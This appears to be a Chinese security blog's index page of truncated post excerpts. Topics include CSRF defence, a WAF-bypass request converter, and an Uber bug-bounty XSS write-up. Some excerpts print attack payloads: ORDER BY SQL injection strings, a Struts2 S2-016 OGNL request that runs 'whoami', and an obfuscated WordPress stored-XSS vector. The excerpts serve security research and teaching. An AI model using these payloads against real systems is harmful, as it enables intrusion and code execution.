CSRF 跨站请求伪造 攻击与防御 — CSRF防御策略

CSRF 跨站请求伪造 攻击与防御  —  CSRF防御策略
看过程能让你更了解如何的安全编码,看文中红字结果让你知道防范措施。 什么是CSRF 跨站请求伪造 CSRF(Cross-site request forgery),中文名称:跨站请求伪造,也被称为:one click attack/session riding,缩写为:CSRF/XSRF。 那么CSRF到底能够干嘛呢?你可以这样简单的理解:攻击者可以盗用你的登陆信息,以你的身份模拟发送各种请求。攻击者只要借助少许的社会工程学...

密码保护:Post、Get数据包转为上传multipart/form-data格式数据包php脚本

密码保护:Post、Get数据包转为上传multipart/form-data格式数据包php脚本
Post、Get数据包转为上传multipart/form-data格式数据包php脚本 说一下写这个工具的初衷吧。有很多时候某些程序接收参数的方式都是通用的,那咱们就可以利用这种方式来绕过WAF等验证来进行攻击。 只需要转换一下格式即可。 在线转换地址:http://gdd.gd/multipart.php Burp Post、Get数据包在线转换工具 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 2...

MySQL Order By 注入总结

MySQL Order By 注入总结
oracle Order By 注入 desc,if( (select 1 from dual where 1=1*)=1 ,1,(select 1 from information_schema.tables)) desc MySQL Order By 注入 select user from user order by user,If((1=1),1,(select user from mysql.user)) desc; abs(jjdm-(length(user())=23)*8000) 前言 最近在做一些漏洞盒子后台项目的总结,在盒子众多众测项目中,注入类的漏洞占比一直...

密码保护:另类执行Struts2命令 及 SQL注入

密码保护:另类执行Struts2命令 及 SQL注入
先说一下Struts2 2013 S2-016的测试payload代码是如下的。 GET /xxxxxxx/rf/userAction!login.action?redirect:$%7B%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String%5B%5D%7B%27whoami%27%7D%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%...

Uber Bug Bounty: Turning Self-XSS into Good-XSS

Uber Bug Bounty: Turning Self-XSS into Good-XSS
Now that the Uber bug bounty programme has launched publicly, I can publish some of my favourite submissions, which I’ve been itching to do over the past year. This is part one of maybe two or three posts. On Uber’s Partners portal, where Drivers can login and update their details, I found a very simple, classic XSS: changing the value of one of...

WordPress全版本储存型XSS漏洞

WordPress全版本储存型XSS漏洞
漏洞发现者: SecJack 安全周@上海匡创 漏洞概述及危害 建站程序类型:php+MySql 漏洞类型:储存型XSS 缺陷文件: formatting.php 漏洞参数:<svg onload=alert('1')> ,(进行混淆) 代码如下: <svg onload=[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([!...

企业生存之 — 挖坑

企业生存之 — 挖坑
挖坑 首先这个“挖坑”无论放在哪里我觉得它就不是一个褒义词。 在企业上班中经常就会遇到各种各样的人,而“挖坑”存在着给别人挖坑,给自己挖坑。先讲一讲给自己挖坑。给自己挖坑虽然从字面理解就是针对自己而已,但实际上有时候给自己挖坑还会带上别人。这样不仅仅是坑了自己,还会坑了他人,坑了自己,自己也就吃一堑长一智了,如果坑了他人那坑的就是关系了。 说说我自己身...

JSONP 跨域请求数据代码(跨域请求数据包)

JSONP 跨域请求数据代码(跨域请求数据包)
同事非想看,没办法弄一段代码给对方展示JSONP跨域请求,只要把下面的代码保存到本地,然后打开就可以获取到JSONP的信息。 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN&qu...